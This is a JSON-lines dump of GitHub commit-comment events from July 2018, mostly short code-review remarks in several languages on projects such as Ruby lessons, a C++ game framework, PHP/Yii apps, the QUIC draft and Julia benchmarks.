{"id":"7935601790","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636854,"position":120,"line":72,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:15:35Z","updated_at":"2018-07-09T06:15:35Z","author_association":"NONE","body":"ну это как-то не очень принято ))\r\nтогда уже напиши 71 строку через `unless`, а 72 и 73 строки просто убери"}},"created_at":"2018-07-09T06:15:35Z"}
{"id":"7935602287","type":"CommitCommentEvent","actor":{"login":"AvantiShri"},"repo":{"name":"kundajelab/tfmodisco"},"payload":{"comment":{"id":29636855,"position":null,"line":null,"path":null,"commit_id":"6ccd3c8fe1c5550114a959a5fa046d902898422b","created_at":"2018-07-09T06:15:44Z","updated_at":"2018-07-09T06:15:44Z","author_association":"COLLABORATOR","body":"Looks good to me!"}},"created_at":"2018-07-09T06:15:44Z"}
{"id":"7935604101","type":"CommitCommentEvent","actor":{"login":"GuoZhiQiang"},"repo":{"name":"Rojuinex/react-native"},"payload":{"comment":{"id":29636860,"position":null,"line":null,"path":null,"commit_id":"4608b97b585363406dd2aa3646bde5ad3045d16d","created_at":"2018-07-09T06:16:20Z","updated_at":"2018-07-09T06:16:20Z","author_association":"NONE","body":"Hi , I have followed your code delete `DevelopmentTeam ` and set `DEVELOPMENT_TEAM ` from `V9WTTPBFK9 ` to `\"\"` . But I still have one error about `target double-conversion-tvOS`: `Team \"\" (Automatic) | Platform tvOS No account for team \"\".........`\r\n![2018-07-09 2 11 16](https://user-images.githubusercontent.com/9813791/42433561-83d7aa6e-8382-11e8-8560-77b063add42d.png)\r\n\r\nCan your help me?"}},"created_at":"2018-07-09T06:16:20Z"}
{"id":"7935604753","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29636862,"position":8,"line":528,"path":"Source/Plugins/bsfSL/BsSLFXCompiler.cpp","commit_id":"d65f1c92a03633d069d4a1f34e9632bc4de9ccd8","created_at":"2018-07-09T06:16:34Z","updated_at":"2018-07-09T06:16:34Z","author_association":"CONTRIBUTOR","body":"You might consider using std::string::assign()\r\n\r\nThis code will always allocate a new string buffer, copy the data, and then move-assign to attribute.value, which will then free it's own buffer.\r\n\r\nWith assign, you have two possibilities. \r\n\r\nThe first is that the new string data is larger than the current string buffer for attribute.value. In which case you're still paying the cost of an allocate and a copy, but any half-decent implementation of string::assign won't copy the existing data that's about to be overwritten, so you end up with the same perf you have now.\r\n\r\nThe second situation is when the new string data is the same size or smaller than the current data. One would only expect an allocate and copy to happen if the new data is substantially smaller than the existing data, otherwise it's just a single copy operation and then some unused buffer. And in the case where the implementation wants to free the substantially larger than needed buffer, I'd expect it to copy the new data, and then use realloc to potentially not need to allocate and copy to a new buffer, but instead just free up the unused buffer (depending on the implementation of realloc, of course)."}},"created_at":"2018-07-09T06:16:34Z"}
{"id":"7935607408","type":"CommitCommentEvent","actor":{"login":"kraj"},"repo":{"name":"agherzan/meta-raspberrypi"},"payload":{"comment":{"id":29636864,"position":null,"line":null,"path":null,"commit_id":"e713c3f60d74fbb864122f8f11a80ca302d53da3","created_at":"2018-07-09T06:17:27Z","updated_at":"2018-07-09T06:17:27Z","author_association":"COLLABORATOR","body":"I think we should still keep this patch, I think weston also needs it"}},"created_at":"2018-07-09T06:17:27Z"}
{"id":"7935607808","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636866,"position":120,"line":72,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:17:34Z","updated_at":"2018-07-09T06:17:34Z","author_association":"NONE","body":"еще можно исползовать `guard clause`\r\nесли интересно - погугли )"}},"created_at":"2018-07-09T06:17:34Z"}
{"id":"7935608365","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636868,"position":127,"line":79,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:17:46Z","updated_at":"2018-07-09T06:17:46Z","author_association":"NONE","body":"см. выше"}},"created_at":"2018-07-09T06:17:46Z"}
{"id":"7935613384","type":"CommitCommentEvent","actor":{"login":"alexleskov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636888,"position":3,"line":2,"path":"Lesson3/route.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:19:21Z","updated_at":"2018-07-09T06:19:21Z","author_association":"OWNER","body":"По-моему, Влад так специально написал, нет?) \r\n@VladFiliucov уточни, пожалуйста"}},"created_at":"2018-07-09T06:19:21Z"}
{"id":"7935614785","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29636891,"position":13,"line":248,"path":"Source/Foundation/bsfCore/CoreThread/BsCoreObject.h","commit_id":"1516903bdbd7280cd44567814af12b79252b53cc","created_at":"2018-07-09T06:19:45Z","updated_at":"2018-07-09T06:19:45Z","author_association":"CONTRIBUTOR","body":"Magic number?\r\n\r\nI'd recommend using named constants, if you haven't already done so in a later commit."}},"created_at":"2018-07-09T06:19:45Z"}
{"id":"7935615980","type":"CommitCommentEvent","actor":{"login":"westCastle"},"repo":{"name":"westCastle/TSTimer"},"payload":{"comment":{"id":29636895,"position":null,"line":null,"path":null,"commit_id":"e8d2b35389689eade5b06423ef7d0d12ab981bac","created_at":"2018-07-09T06:20:08Z","updated_at":"2018-07-09T06:20:08Z","author_association":"OWNER","body":"项目计划书"}},"created_at":"2018-07-09T06:20:08Z"}
{"id":"7935616663","type":"CommitCommentEvent","actor":{"login":"R3x"},"repo":{"name":"R3x/src"},"payload":{"comment":{"id":29636897,"position":180,"line":386,"path":"sys/arch/amd64/amd64/report.c","commit_id":"c5b5cafd82cc47cc2f9ded9a07b968ea48764d7f","created_at":"2018-07-09T06:20:21Z","updated_at":"2018-07-09T06:20:21Z","author_association":"OWNER","body":"If multishot is not enabled then kasan stops after the first bug report. This is the commit that has added it.\r\nhttps://github.com/torvalds/linux/commit/b0845ce58379d11dcad4cdb6824a6410de260216#diff-8a3553930924a46bd94e05534a4ef229"}},"created_at":"2018-07-09T06:20:21Z"}
{"id":"7935617167","type":"CommitCommentEvent","actor":{"login":"rossdakin"},"repo":{"name":"rossdakin/wp-auth0"},"payload":{"comment":{"id":29636899,"position":null,"line":null,"path":null,"commit_id":"b2d8f468c8b06850cc7b9f8dbc7394e1d1f7a845","created_at":"2018-07-09T06:20:29Z","updated_at":"2018-07-09T06:20:29Z","author_association":"OWNER","body":"Add NSNSP-specific wording.\r\n\r\nNote to self: I just manually edited this in the uploaded plugin directory. Updating the plugin will blow away the change and require editing the line to include this wording again. Cheap option."}},"created_at":"2018-07-09T06:20:29Z"}
{"id":"7935617262","type":"CommitCommentEvent","actor":{"login":"alexleskov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636900,"position":38,"line":17,"path":"Lesson3/route.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:20:31Z","updated_at":"2018-07-09T06:20:31Z","author_association":"OWNER","body":"Что бы весь метод лишний раз не запускать.\r\nСмысл код выполнять, если данные изначально неверные ввели. Нет?"}},"created_at":"2018-07-09T06:20:31Z"}
{"id":"7935617446","type":"CommitCommentEvent","actor":{"login":"t-makaro"},"repo":{"name":"t-makaro/nbconvert"},"payload":{"comment":{"id":29636902,"position":null,"line":null,"path":null,"commit_id":"48937b3a0d879d3efe11986152eb9ae251e562db","created_at":"2018-07-09T06:20:35Z","updated_at":"2018-07-09T06:20:35Z","author_association":"OWNER","body":"I'm not super happy with having the style in the base preprocessor when only the latex and html preprocessors need it, but this allows for a nice cli flag and maybe other preprocessors could use it."}},"created_at":"2018-07-09T06:20:35Z"}
{"id":"7935620436","type":"CommitCommentEvent","actor":{"login":"mikkelfj"},"repo":{"name":"quicwg/base-drafts"},"payload":{"comment":{"id":29636905,"position":16,"line":742,"path":"draft-ietf-quic-transport.md","commit_id":"21f9ba5250712726f1112695a8d8a168a567c693","created_at":"2018-07-09T06:21:26Z","updated_at":"2018-07-09T06:21:26Z","author_association":"NONE","body":"missing words"}},"created_at":"2018-07-09T06:21:26Z"}
{"id":"7935620995","type":"CommitCommentEvent","actor":{"login":"jannes-m"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29636906,"position":null,"line":null,"path":null,"commit_id":"e3bdbcf839e285f416158d1a87a20aee504f4cd9","created_at":"2018-07-09T06:21:38Z","updated_at":"2018-07-09T06:21:38Z","author_association":"COLLABORATOR","body":"pls wait with switching to the RQGIS CRAN version. Before doing so I should submit a minor RQGIS update to CRAN. I plan to do so in the next weeks as soon as the term is over..."}},"created_at":"2018-07-09T06:21:38Z"}
{"id":"7935642876","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636937,"position":38,"line":17,"path":"Lesson3/route.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:28:31Z","updated_at":"2018-07-09T06:28:31Z","author_association":"NONE","body":"ок, оставляй )"}},"created_at":"2018-07-09T06:28:31Z"}
{"id":"7935645251","type":"CommitCommentEvent","actor":{"login":"yuichiro-seki"},"repo":{"name":"piva8383/IrebanLab"},"payload":{"comment":{"id":29636941,"position":null,"line":null,"path":null,"commit_id":"1484da438bb1bffd0ddea71f651d5417468d54a3","created_at":"2018-07-09T06:29:13Z","updated_at":"2018-07-09T06:29:13Z","author_association":"COLLABORATOR","body":"確認しました。マージします。"}},"created_at":"2018-07-09T06:29:13Z"}
{"id":"7935646177","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":29636943,"position":3,"line":2,"path":"system/vendor/etc/init/rild.rc","commit_id":"6c5c3cbedcc7adc3dc1be37332d4a05382c506a5","created_at":"2018-07-09T06:29:31Z","updated_at":"2018-07-09T06:29:31Z","author_association":"NONE","body":"No need `-c 0`, since it's default"}},"created_at":"2018-07-09T06:29:31Z"}
{"id":"7935647004","type":"CommitCommentEvent","actor":{"login":"Vvvvvia"},"repo":{"name":"Weeeeeb/WebProject"},"payload":{"comment":{"id":29636945,"position":null,"line":null,"path":null,"commit_id":"b82b7a4180d8a4763d912eb94d7c50cc98459e3a","created_at":"2018-07-09T06:29:46Z","updated_at":"2018-07-09T06:29:46Z","author_association":"MEMBER","body":"成员信息表"}},"created_at":"2018-07-09T06:29:46Z"}
{"id":"7935647059","type":"CommitCommentEvent","actor":{"login":"gujinghui"},"repo":{"name":"intel/ideep"},"payload":{"comment":{"id":29636946,"position":43,"line":2339,"path":"include/ideep/computations.hpp","commit_id":"55a293c4f71efebbef389cf00e1637fc36ffa621","created_at":"2018-07-09T06:29:47Z","updated_at":"2018-07-09T06:29:47Z","author_association":"CONTRIBUTOR","body":"Not sure if I got this well. You mean these are constants and should be calculated out of for loops?\r\nThe compiler should do this usually."}},"created_at":"2018-07-09T06:29:47Z"}
{"id":"7935647593","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"macycumapy/yii2_lesson"},"payload":{"comment":{"id":29636947,"position":5,"line":20,"path":"config/web.php","commit_id":"790710223f7a151c034e7efd16a2ed17fcfb28ba","created_at":"2018-07-09T06:29:59Z","updated_at":"2018-07-09T06:29:59Z","author_association":"NONE","body":"Желательно удалять закомментированный код"}},"created_at":"2018-07-09T06:29:59Z"}
{"id":"7935650399","type":"CommitCommentEvent","actor":{"login":"GaiaDCI"},"repo":{"name":"GaiaDCI/First"},"payload":{"comment":{"id":29636954,"position":null,"line":null,"path":null,"commit_id":"29d0f4ff0b488ec6bb2589dd6eb745612412890c","created_at":"2018-07-09T06:30:49Z","updated_at":"2018-07-09T06:30:49Z","author_association":"OWNER","body":"rep deleted"}},"created_at":"2018-07-09T06:30:49Z"}
{"id":"7935650603","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"macycumapy/yii2_lesson"},"payload":{"comment":{"id":29636955,"position":8,"line":23,"path":"config/web.php","commit_id":"790710223f7a151c034e7efd16a2ed17fcfb28ba","created_at":"2018-07-09T06:30:52Z","updated_at":"2018-07-09T06:30:52Z","author_association":"NONE","body":"Старайся использовать константу ::class вместо строкового представления"}},"created_at":"2018-07-09T06:30:52Z"}
{"id":"7935651367","type":"CommitCommentEvent","actor":{"login":"gujinghui"},"repo":{"name":"intel/ideep"},"payload":{"comment":{"id":29636956,"position":62,"line":2358,"path":"include/ideep/computations.hpp","commit_id":"55a293c4f71efebbef389cf00e1637fc36ffa621","created_at":"2018-07-09T06:31:08Z","updated_at":"2018-07-09T06:31:08Z","author_association":"CONTRIBUTOR","body":"This is the first step if channel_shuffle optimization. We're discuss with MKL-DNN team to deal with other internal formats. And, also the fusion for this op."}},"created_at":"2018-07-09T06:31:08Z"}
{"id":"7935652444","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":29636961,"position":3,"line":2,"path":"system/vendor/etc/init/rild.rc","commit_id":"6c5c3cbedcc7adc3dc1be37332d4a05382c506a5","created_at":"2018-07-09T06:31:28Z","updated_at":"2018-07-09T06:31:28Z","author_association":"OWNER","body":"0 2 3. What on earth!"}},"created_at":"2018-07-09T06:31:28Z"}
{"id":"7935652460","type":"CommitCommentEvent","actor":{"login":"accumulatepig"},"repo":{"name":"chrislusf/seaweedfs"},"payload":{"comment":{"id":29636962,"position":null,"line":null,"path":null,"commit_id":"702ff48cdac224e0ec9f8b9f03591785496e5874","created_at":"2018-07-09T06:31:28Z","updated_at":"2018-07-09T06:31:28Z","author_association":"NONE","body":"oh, i get it , you add the dirListingLimit  to control the limit in filer startup parameter , thks"}},"created_at":"2018-07-09T06:31:28Z"}
{"id":"7935654077","type":"CommitCommentEvent","actor":{"login":"SheepTester"},"repo":{"name":"SheepTester/scratch-gui"},"payload":{"comment":{"id":29636968,"position":null,"line":null,"path":null,"commit_id":"6c067fc223999f2e35b8846d7cec3199645e1a45","created_at":"2018-07-09T06:32:00Z","updated_at":"2018-07-09T06:32:00Z","author_association":"OWNER","body":"wait why won't you build"}},"created_at":"2018-07-09T06:32:00Z"}
{"id":"7935655390","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"macycumapy/yii2_lesson"},"payload":{"comment":{"id":29636969,"position":1,"line":1,"path":"vendor/codeception/base/CHANGELOG-2.4.md","commit_id":"790710223f7a151c034e7efd16a2ed17fcfb28ba","created_at":"2018-07-09T06:32:25Z","updated_at":"2018-07-09T06:32:25Z","author_association":"NONE","body":"у тебя не заигнорена папка vendor - замучаешься с коммитам) помести ее в .gitignore"}},"created_at":"2018-07-09T06:32:25Z"}
{"id":"7935658506","type":"CommitCommentEvent","actor":{"login":"SheepTester"},"repo":{"name":"SheepTester/scratch-gui"},"payload":{"comment":{"id":29636975,"position":null,"line":null,"path":null,"commit_id":"8d9d6c96e059bb949d24084e054936632d3f2fd4","created_at":"2018-07-09T06:33:23Z","updated_at":"2018-07-09T06:33:23Z","author_association":"OWNER","body":"ok nvm it started building the last commit. I just had to be patient"}},"created_at":"2018-07-09T06:33:23Z"}
{"id":"7935663143","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"celebron/geek"},"payload":{"comment":{"id":29636978,"position":16,"line":16,"path":"controllers/NoteaccessController.php","commit_id":"d92f6ab1d2fb680b5311584322f3becb70de22eb","created_at":"2018-07-09T06:34:48Z","updated_at":"2018-07-09T06:34:48Z","author_association":"NONE","body":"NoteAccess читается удобнее чем Noteaccess. Но тогда такой контроллер будет по адресу /note-access, а не /noteaccess"}},"created_at":"2018-07-09T06:34:48Z"}
{"id":"7935664592","type":"CommitCommentEvent","actor":{"login":"yezooz"},"repo":{"name":"planarnetwork/uk-rail-provider"},"payload":{"comment":{"id":29636982,"position":null,"line":null,"path":null,"commit_id":"e4747b05f1c7128011c18c8dc2b02e5c6a7cd5a7","created_at":"2018-07-09T06:35:14Z","updated_at":"2018-07-09T06:35:14Z","author_association":"CONTRIBUTOR","body":"❤️ "}},"created_at":"2018-07-09T06:35:14Z"}
{"id":"7935664698","type":"CommitCommentEvent","actor":{"login":"shahmirn"},"repo":{"name":"shahmirn/EdiZon_ConfigsAndScripts"},"payload":{"comment":{"id":29636983,"position":null,"line":null,"path":null,"commit_id":"423323cf2a7464b4969aa5c338b95cdc6516dc79","created_at":"2018-07-09T06:35:16Z","updated_at":"2018-07-09T06:35:16Z","author_association":"OWNER","body":"@hrtbrkd I just pushed octp.lua and 010096000B3EA000.json, so hopefully it works now. Could you backup your existing save, and then test it?\r\n\r\nThanks!"}},"created_at":"2018-07-09T06:35:16Z"}
{"id":"7935665786","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"celebron/geek"},"payload":{"comment":{"id":29636984,"position":114,"line":141,"path":"controllers/NoteController.php","commit_id":"d92f6ab1d2fb680b5311584322f3becb70de22eb","created_at":"2018-07-09T06:35:36Z","updated_at":"2018-07-09T06:35:36Z","author_association":"NONE","body":"if  в одну строчку не рекомендуется писать по PSR. Сильно место не экономится, а читаемость падает"}},"created_at":"2018-07-09T06:35:36Z"}
{"id":"7935665918","type":"CommitCommentEvent","actor":{"login":"CTCaer"},"repo":{"name":"CTCaer/hekate"},"payload":{"comment":{"id":29636985,"position":null,"line":null,"path":null,"commit_id":"6d556bf21309839bf49ffba608a6935952c7e890","created_at":"2018-07-09T06:35:39Z","updated_at":"2018-07-09T06:35:39Z","author_association":"OWNER","body":"As per the [standard](http://c0x.coding-guidelines.com/6.4.5.html#902):\r\n\r\n> A byte or code of value zero is appended to each multibyte character sequence that results from a string literal or literals.\r\n\r\nSo basically a string literal of 10 chars is stored as 11 chars, because the compiler includes the null terminator.\r\nThere's no problem of getting garbage."}},"created_at":"2018-07-09T06:35:39Z"}
{"id":"7935667622","type":"CommitCommentEvent","actor":{"login":"herom"},"repo":{"name":"vpulim/node-soap"},"payload":{"comment":{"id":29636988,"position":null,"line":null,"path":null,"commit_id":"d6d22c9209a7b2ebbc85e98b7a1a0a3cddb13ea1","created_at":"2018-07-09T06:36:13Z","updated_at":"2018-07-09T06:36:13Z","author_association":"COLLABORATOR","body":"@jsdevel @qwelias In my opinion, we didn't break \"semver\" at all, even if it was a breaking change, because according to ]Semver-Spec #4](https://semver.org/#spec-item-4) everyting which is released under major version `0`, is \"initial development\".\r\n\r\nThat said, I'd vote for this module to release it's version `1.0.0` as it fulfills all requirements to be treated as such."}},"created_at":"2018-07-09T06:36:13Z"}
{"id":"7935668172","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29636989,"position":null,"line":null,"path":null,"commit_id":"b6f9244d6bb00bb3ccc10d42503f33ba1c3aaa70","created_at":"2018-07-09T06:36:24Z","updated_at":"2018-07-09T06:36:24Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/b6f9244d6bb00bb3ccc10d42503f33ba1c3aaa70#commitcomment-29636152) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/10e432bd2a1100e3658b57d63a96542429dc3f06/daily_2018_7_9/report.md). cc @ararslan"}},"created_at":"2018-07-09T06:36:24Z"}
{"id":"7935668576","type":"CommitCommentEvent","actor":{"login":"enaut"},"repo":{"name":"Hideakiii/School-Tasks"},"payload":{"comment":{"id":29636990,"position":72,"line":127,"path":"Avalonion_v4/Avalonion_v6.py","commit_id":"29e9323f739a4da62bc13120dca3f3d1023bd105","created_at":"2018-07-09T06:36:33Z","updated_at":"2018-07-09T06:36:33Z","author_association":"CONTRIBUTOR","body":"Die Objekte sind nicht auf dem Bildschirm, weil sie das hier ganz oben startet, und dann nach oben fliegt...\r\n\r\nalso richtig sind zwei Möglichkeiten:\r\n  * `objects.add(Object(random.randrange(0,game.display_width),+700,75,75, [0 ,-5]))`\r\n  * `objects.add(Object(random.randrange(0,game.display_width),0,75,75, [0 ,5]))`\r\n\r\nAlso entweder die Startposition nach unten setzen, oder die Richtung nach unten ändern."}},"created_at":"2018-07-09T06:36:33Z"}
{"id":"7935668655","type":"CommitCommentEvent","actor":{"login":"martinthomson"},"repo":{"name":"quicwg/base-drafts"},"payload":{"comment":{"id":29636991,"position":16,"line":742,"path":"draft-ietf-quic-transport.md","commit_id":"21f9ba5250712726f1112695a8d8a168a567c693","created_at":"2018-07-09T06:36:33Z","updated_at":"2018-07-09T06:36:33Z","author_association":"MEMBER","body":"An extra \"on\", more like.  Thanks."}},"created_at":"2018-07-09T06:36:33Z"}
{"id":"7935669287","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"celebron/geek"},"payload":{"comment":{"id":29636992,"position":22,"line":22,"path":"logic/NoteAccessControl.php","commit_id":"d92f6ab1d2fb680b5311584322f3becb70de22eb","created_at":"2018-07-09T06:36:45Z","updated_at":"2018-07-09T06:36:45Z","author_association":"NONE","body":"методы рекомендуется именовать с нижней буквы"}},"created_at":"2018-07-09T06:36:45Z"}
{"id":"7935671009","type":"CommitCommentEvent","actor":{"login":"Cremiy"},"repo":{"name":"Cremiy/learning-machine"},"payload":{"comment":{"id":29636995,"position":null,"line":null,"path":null,"commit_id":"ecd4afb253c132a9772e7343ac0f53f2df6cb964","created_at":"2018-07-09T06:37:18Z","updated_at":"2018-07-09T06:37:18Z","author_association":"OWNER","body":"nothing to change"}},"created_at":"2018-07-09T06:37:18Z"}
{"id":"7935671486","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"celebron/geek"},"payload":{"comment":{"id":29636996,"position":26,"line":26,"path":"logic/NoteAccessControl.php","commit_id":"d92f6ab1d2fb680b5311584322f3becb70de22eb","created_at":"2018-07-09T06:37:26Z","updated_at":"2018-07-09T06:37:26Z","author_association":"NONE","body":"константа SELF на самом деле self) так же по PSR"}},"created_at":"2018-07-09T06:37:26Z"}
{"id":"7935673874","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29636999,"position":79,"line":96,"path":"Source/Foundation/bsfCore/Scene/BsSceneActor.cpp","commit_id":"1516903bdbd7280cd44567814af12b79252b53cc","created_at":"2018-07-09T06:38:10Z","updated_at":"2018-07-09T06:38:10Z","author_association":"CONTRIBUTOR","body":"Not that this is relevant to this particular chunk of code, but I wonder if a bit of meta-programming couldn't give rttiGetElemSize a speed boost.\r\n\r\nIt's implemented like this at the moment.\r\n\r\n```\r\ntemplate<class ElemType>\r\nUINT32 rttiGetElemSize(const ElemType& data)\r\n{\r\n    if(RTTIPlainType<ElemType>::hasDynamicSize == 1)\r\n        return RTTIPlainType<ElemType>::getDynamicSize(data);\r\n    else\r\n        return sizeof(ElemType);\r\n}\r\n```\r\n\r\nBut ElemType is, obviously, a typename, and RTTIPlainType<ElemType>::hasDynamicSize is a static constant.\r\n\r\nAdding some SFINAE to rttiGetElemSize similar to this almost-real-cpp-code\r\n\r\n```\r\ntemplate<class ElemType, std::enable_if<std::integral_constant<bool, RTTIPlainType<ElemType>::hasDynamicSize>>...> // This version of SFINAE using variadic templates is a trick I picked up a while ago. Can't find the blog post for it, sorry.\r\nUINT32 rttiGetElemSize(const ElemType& data)\r\n{\r\n    return RTTIPlainType<ElemType>::getDynamicSize(data);\r\n}\r\n\r\ntemplate<class ElemType, std::disable_if<std::integral_constant<bool, RTTIPlainType<ElemType>::hasDynamicSize>>...>\r\nconstexpr UINT32 rttiGetElemSize(const ElemType& data)\r\n{\r\n    return sizeof(ElemType);\r\n}\r\n```\r\n\r\n\r\n*should* let you get a substantial runtime speed bump for any static-sized element, at the small cost of slightly-increased compile times.\r\n\r\nThough, with if statements evaluating constants, it's always difficult to figure out exactly how smart the compiler is *actually* being. It could be that one or more compiler currently used is already doing this. Not clear.\r\n\r\n\r\nEither way, given that rttiGetElemSize is a template function, you should be able to make it constexpr, allowing it to be constexpr for any type where getDynamicSize is constexpr, and non-constexpr otherwise.\r\n"}},"created_at":"2018-07-09T06:38:10Z"}
{"id":"7935676766","type":"CommitCommentEvent","actor":{"login":"PrimaryFeather"},"repo":{"name":"Gamua/Starling-Framework"},"payload":{"comment":{"id":29637003,"position":7,"line":89,"path":"starling/src/starling/utils/Color.as","commit_id":"0744d514918bd62dce2f99f7b52df1f3601ac888","created_at":"2018-07-09T06:39:02Z","updated_at":"2018-07-09T06:39:02Z","author_association":"CONTRIBUTOR","body":"Thanks, Aurélien! You're right, it would make sense to add all of those to the Color class. If you've got a few minutes time, perhaps you can send them to me! Ideally, just open up a new issue and post your code into it. Then I'll integrate it when I've got some time. :-) \r\n\r\nThanks a lot in advance! :smile:"}},"created_at":"2018-07-09T06:39:02Z"}
{"id":"7935687454","type":"CommitCommentEvent","actor":{"login":"SeoYoungSun"},"repo":{"name":"SeoYoungSun/NewSkyProject"},"payload":{"comment":{"id":29637024,"position":null,"line":null,"path":null,"commit_id":"ba8fe8ecf7f81d6427132c0a2c7f92e0b1515e17","created_at":"2018-07-09T06:42:10Z","updated_at":"2018-07-09T06:42:10Z","author_association":"OWNER","body":"ojdbc는 따로 추가해야함 gitnore설정때문에 commit에 반영되지 않음 "}},"created_at":"2018-07-09T06:42:10Z"}
{"id":"7935687574","type":"CommitCommentEvent","actor":{"login":"cyberliem"},"repo":{"name":"KyberNetwork/reserve-data"},"payload":{"comment":{"id":29637025,"position":null,"line":null,"path":null,"commit_id":"c37a857fa413bab7db6ea57ea7eb9c6198c8fef0","created_at":"2018-07-09T06:42:11Z","updated_at":"2018-07-09T06:42:11Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Review logic of log fetcher in stat/fetcher.go.](https://trello.com/c/2HleHStn/71-review-logic-of-log-fetcher-in-stat-fetchergo)"}},"created_at":"2018-07-09T06:42:11Z"}
{"id":"7935689450","type":"CommitCommentEvent","actor":{"login":"vondele"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29637027,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T06:42:44Z","updated_at":"2018-07-09T06:42:44Z","author_association":"OWNER","body":"I guess this is not too unexpected, the system is running fully hyperthreaded (192 -> 384), and this test runs thus with 12x32 search threads.. additionally the OS, cutechess, and a whole bunch of UCI threads are around... so not every thread will be running all the time. The same tight time management is used, just terminating the 32 threads might take some time... that must lead to some time failures. Let's hope this averages out."}},"created_at":"2018-07-09T06:42:44Z"}
{"id":"7935689685","type":"CommitCommentEvent","actor":{"login":"tobiasd"},"repo":{"name":"friendica/friendica"},"payload":{"comment":{"id":29637028,"position":6,"line":32,"path":"view/theme/vier/theme.php","commit_id":"3e797547a37f8c8f22e88965b4a4d278bcc192e0","created_at":"2018-07-09T06:42:49Z","updated_at":"2018-07-09T06:42:49Z","author_association":"COLLABORATOR","body":"One of these changes has broken the feature of vier to move the forum widget from the left to the right aside when enough space is available due browser window width."}},"created_at":"2018-07-09T06:42:49Z"}
{"id":"7935692719","type":"CommitCommentEvent","actor":{"login":"diasdavid"},"repo":{"name":"ipfs/developer-meetings"},"payload":{"comment":{"id":29637035,"position":null,"line":null,"path":null,"commit_id":"acdf3aeaaea12afdf46c73a52900b013001b9736","created_at":"2018-07-09T06:43:40Z","updated_at":"2018-07-09T06:43:40Z","author_association":"MEMBER","body":"@flyingzumwalt I've picked the 15 options for the first round of poster sessions, see the ones with a 🌟"}},"created_at":"2018-07-09T06:43:40Z"}
{"id":"7935694017","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29637040,"position":null,"line":null,"path":null,"commit_id":"abb90e971c3732f046f3c9ce4e02edaf4e6c7a5a","created_at":"2018-07-09T06:44:03Z","updated_at":"2018-07-09T06:44:03Z","author_association":"COLLABORATOR","body":"In both the reference and the output, shouldn't Kuran Kerim be Kuran-ı Kerim?"}},"created_at":"2018-07-09T06:44:03Z"}
{"id":"7935700382","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637052,"position":56,"line":133,"path":"src/ThundraWrapper.ts","commit_id":"c3e674a48e4ca224c0df8b8927bb74f4b7b7f42d","created_at":"2018-07-09T06:45:47Z","updated_at":"2018-07-09T06:45:47Z","author_association":"MEMBER","body":"If `callbackWaitsForEmptyEventLoop` is `false` (`true` by default), after `callback` is called response is returned and container is freezed. So it is better to clear timeout before calling  `callback`. \r\n\r\nSee `The Context Object Properties (Node.js)` section for more details: https://docs.aws.amazon.com/lambda/latest/dg/nodejs-prog-model-context.html "}},"created_at":"2018-07-09T06:45:47Z"}
{"id":"7935705863","type":"CommitCommentEvent","actor":{"login":"dingbaoc"},"repo":{"name":"Microsemi/switchtec-kernel"},"payload":{"comment":{"id":29637059,"position":null,"line":null,"path":null,"commit_id":"2497156b21f541332195741a628014aed2109e06","created_at":"2018-07-09T06:47:23Z","updated_at":"2018-07-09T06:47:23Z","author_association":"COLLABORATOR","body":"it's good to me"}},"created_at":"2018-07-09T06:47:23Z"}
